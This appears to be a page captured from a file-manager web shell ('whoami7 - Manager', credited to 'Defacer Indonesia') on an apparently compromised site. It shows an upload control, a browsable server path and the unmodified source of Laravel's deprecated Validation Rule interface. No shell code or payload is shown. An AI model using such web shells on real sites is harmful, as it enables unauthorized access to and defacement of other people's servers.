whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Contracts
/
Validation
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/laravel/framework/src/Illuminate/Contracts/Validation/Rule.php
<?php namespace Illuminate\Contracts\Validation; /** * @deprecated see ValidationRule */ interface Rule { /** * Determine if the validation rule passes. * * @param string $attribute * @param mixed $value * @return bool */ public function passes($attribute, $value); /** * Get the validation error message. * * @return string|array */ public function message(); }
Copyright ©2021 || Defacer Indonesia